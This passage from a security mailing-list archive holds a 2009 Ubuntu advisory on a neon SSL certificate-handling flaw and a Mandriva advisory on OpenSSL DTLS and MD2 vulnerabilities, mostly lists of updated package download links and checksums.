=== Ubuntu Security Notice USN-835-1 September 21, 2009 neon, neon27 vulnerabilities CVE-2008-3746, CVE-2009-2474 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libneon25 0.25.5.dfsg-5ubuntu0.1 Ubuntu 8.04 LTS: libneon27 0.27.2-1ubuntu0.1 libneon27-gnutls0.27.2-1ubuntu0.1 Ubuntu 8.10: libneon27 0.28.2-2ubuntu0.1 libneon27-gnutls0.28.2-2ubuntu0.1 Ubuntu 9.04: libneon27 0.28.2-6.1ubuntu0.1 libneon27-gnutls0.28.2-6.1ubuntu0.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Joe Orton discovered that neon did not correctly handle SSL certificates with zero bytes in the Common Name. A remote attacker could exploit this to perform a man in the middle attack to view sensitive information or alter encrypted communications. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/neon/neon_0.25.5.dfsg-5ubuntu0.1.diff.gz Size/MD5:21241 816587e0cf93ab4a4b83facb7768962f http://security.ubuntu.com/ubuntu/pool/main/n/neon/neon_0.25.5.dfsg-5ubuntu0.1.dsc Size/MD5: 789 883a571edfb6ca2f265b6cc830b92cec http://security.ubuntu.com/ubuntu/pool/main/n/neon/neon_0.25.5.dfsg.orig.tar.gz Size/MD5: 633438 32ed43bea8568f8f592266c6ff6acf0f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/neon/libneon25-dbg_0.25.5.dfsg-5ubuntu0.1_amd64.deb Size/MD5: 150072 8fe35489f1bf3c0d9dc029c737a3b400 http://security.ubuntu.com/ubuntu/pool/main/n/neon/libneon25-dev_0.25.5.dfsg-5ubuntu0.1_amd64.deb Size/MD5: 139964 1fc960e8c8d23498f73651158c5fed88 http://security.ubuntu.com/ubuntu/pool/main/n/neon/libneon25_0.25.5.dfsg-5ubuntu0.1_amd64.deb Size/MD5: 105972 718aab24299009494603f217d680343e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/neon/libneon25-dbg_0.25.5.dfsg-5ubuntu0.1_i386.deb Size/MD5: 129460 850a2dcae6650b6cd360d8fd5e260306 http://security.ubuntu.com/ubuntu/pool/main/n/neon/libneon25-dev_0.25.5.dfsg-5ubuntu0.1_i386.deb Size/MD5: 127282 b29d4d5725a2b166a65317b39d927a2d http://security.ubuntu.com/ubuntu/pool/main/n/neon/libneon25_0.25.5.dfsg-5ubuntu0.1_i386.deb Size/MD5:98742 d925ff133a28cd973197e22b2e0d18e4 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/n/neon/libneon25-dbg_0.25.5.dfsg-5ubuntu0.1_powerpc.deb Size/MD5: 149668 037f23da1f9566622a018632fe610c2d http://security.ubuntu.com/ubuntu/pool/main/n/neon/libneon25-dev_0.25.5.dfsg-5ubuntu0.1_powerpc.deb Size/MD5: 139344 f1fe92c7c7f59ca0968a1bb87d585717 http://security.ubuntu.com/ubuntu/pool/main/n/neon/libneon25_0.25.5.dfsg-5ubuntu0.1_powerpc.deb Size/MD5: 102650 38eff65b3cb36fdf18b1a9c508ebbd56 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/n/neon/libneon25-dbg_0.25.5.dfsg-5ubuntu0.1_sparc.deb Size/MD5: 131338 e204e6cb89e1bf96d3367c3bbf1487c1 http://security.ubuntu.com/ubuntu/pool/main/n/neon/libneon25-dev_0.25.5.dfsg-5ubuntu0.1_sparc.deb Size/MD5: 133516 213211b48418ed7388bb9235130efa9a http://security.ubuntu.com/ubuntu/pool/main/n/neon/libneon25_0.25.5.dfsg-5ubuntu0.1_sparc.deb Size/MD5: 101588 3cb88debbc07258d7ee434b32262128e Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/neon27/neon27_0.27.2-1ubuntu0.1.diff.gz Size/MD5:20712 20939a5349b3b1d57c6ce3660e362f42 http://security.ubuntu.com/ubuntu/pool/main/n/neon27/neon27_0.27.2-1ubuntu0.1.dsc Size/MD5: 939 a8ad0b6b6c520828fd7d00749897f26a http://security.ubuntu.com/ubuntu/pool/main/n/neon27/neon27_0.27.2.orig.tar.gz Size/MD5: 812750 24d434a4d5d4b6ce8f076039688f60ce amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/neon27/libneon27-dbg_0.27.2-1ubuntu0.1_amd64.deb Size/MD5: 176652 ed7021e0f6b21df0851aab43e6c008d3 http://security.ubuntu.com/ubuntu/pool/main/n/neon27/libneon27-dev_0.27.2-1ubuntu0.1_amd64.deb Size/MD5: 402820 9f302f4e9031233a43d49b636706e13f http://security.ubuntu.com/ubuntu/pool/main/n/neon27/libneon27-gnutls-dbg_0.27.2-1ubuntu0.1_amd64.deb Size/MD5: 157874 ff25752134f938896a7b146169ddee49
[ MDVSA-2009:238 ] openssl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:238 http://www.mandriva.com/security/ ___ Package : openssl Date: September 21, 2009 Affected: 2008.1, 2009.0, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities was discovered and corrected in openssl: Use-after-free vulnerability in the dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL 1.0.0 Beta 2 allows remote attackers to cause a denial of service (openssl s_client crash) and possibly have unspecified other impact via a DTLS packet, as demonstrated by a packet from a server that uses a crafted server certificate (CVE-2009-1379). ssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a DTLS ChangeCipherSpec packet that occurs before ClientHello (CVE-2009-1386). The dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL before 1.0.0 Beta 2 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence DTLS handshake message, related to a fragment bug. (CVE-2009-1387) The NSS library library before 3.12.3, as used in Firefox; GnuTLS before 2.6.4 and 2.7.4; OpenSSL 0.9.8 through 0.9.8k; and other products support MD2 with X.509 certificates, which might allow remote attackers to spooof certificates by using MD2 design flaws to generate a hash collision in less than brute-force time. NOTE: the scope of this issue is currently limited because the amount of computation required is still large (CVE-2009-2409). This update provides a solution to these vulnerabilities. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1379 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1387 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409 ___ Updated Packages: Mandriva Linux 2008.1: 4413a38da4754d54fc161e3c06b81c72 2008.1/i586/libopenssl0.9.8-0.9.8g-4.5mdv2008.1.i586.rpm 7994189a9bdff555fa34d763a9eec321 2008.1/i586/libopenssl0.9.8-devel-0.9.8g-4.5mdv2008.1.i586.rpm bfd128daaf2831e0af5cfd5163067be9 2008.1/i586/libopenssl0.9.8-static-devel-0.9.8g-4.5mdv2008.1.i586.rpm cb8236b62c2edba4033f1cafa39c4ce5 2008.1/i586/openssl-0.9.8g-4.5mdv2008.1.i586.rpm e0a15b72d2ef1d458f259368042f6321 2008.1/SRPMS/openssl-0.9.8g-4.5mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: f12af113949996063624f4c638d5c75c 2008.1/x86_64/lib64openssl0.9.8-0.9.8g-4.5mdv2008.1.x86_64.rpm 0a6db81684a049b45d4536d583864415 2008.1/x86_64/lib64openssl0.9.8-devel-0.9.8g-4.5mdv2008.1.x86_64.rpm f4f9dd377c41a83af03efe923a0e106e 2008.1/x86_64/lib64openssl0.9.8-static-devel-0.9.8g-4.5mdv2008.1.x86_64.rpm e317fbadd87171b291584a9275f6b656 2008.1/x86_64/openssl-0.9.8g-4.5mdv2008.1.x86_64.rpm e0a15b72d2ef1d458f259368042f6321 2008.1/SRPMS/openssl-0.9.8g-4.5mdv2008.1.src.rpm Mandriva Linux 2009.0: 62125f9fde11ecec42ae21075a34f4c7 2009.0/i586/libopenssl0.9.8-0.9.8h-3.4mdv2009.0.i586.rpm 4e21025e35ffefe8ab4b8a2d5368a450 2009.0/i586/libopenssl0.9.8-devel-0.9.8h-3.4mdv2009.0.i586.rpm 5887cbeeb89f1e9824868d977ae7c83e 2009.0/i586/libopenssl0.9.8-static-devel-0.9.8h-3.4mdv2009.0.i586.rpm 45cf6fd02fadbca35ccfc1dea1e1054e 2009.0/i586/openssl-0.9.8h-3.4mdv2009.0.i586.rpm 2942f8a0a8070f3a59d9bfc6c8fa50c5 2009.0/SRPMS/openssl-0.9.8h-3.4mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 287b7f8b3d478451e16b3e391e348c5e 2009.0/x86_64/lib64openssl0.9.8-0.9.8h-3.4mdv2009.0.x86_64.rpm a7079cfda34bf4f4db722753244ee41b 2009.0/x86_64/lib64openssl0.9.8-devel-0.9.8h-3.4mdv2009.0.x86_64.rpm 047265cc0d6ac4627f9d82c3b809f362 2009.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8h-3.4mdv2009.0.x86_64.rpm 9395a6acd0c2546f76da5a318d2f494f 2009.0/x86_64/openssl-0.9.8h-3.4mdv2009.0.x86_64.rpm 2942f8a0a8070f3a59d9bfc6c8fa50c5 2009.0/SRPMS/openssl-0.9.8h-3.4mdv2009.0.src.rpm Mandriva Enterprise Server 5: f7162720ce8713b9087cf91f7c2107c1 mes5/i586/libopenssl0.9.8-0.9.8h-3.4mdvmes5.i586.rpm fb5183cd2e7adf3013f8224363cc5391 mes5/i586/libopenssl0.9.8-devel-0.9.8h-3.4mdvmes5.i586.rpm e3b7029bd10babd86023f2b3299ec957 mes5/i586/libopenssl0.9.8-static-devel-0.9.8h-3.4mdvmes5.i586.rpm 4dc42b91974a65a75412896c0517a1ac mes5/i586/openssl-0.9.8h-3.4mdvmes5.i586.rpm ba1f57df4b57fe6ba79dd083a99c1b8d mes5/SRPMS/openssl-0.9.8h-3.4mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: d17052790ec6dbc7c98acbc552ed1d5a
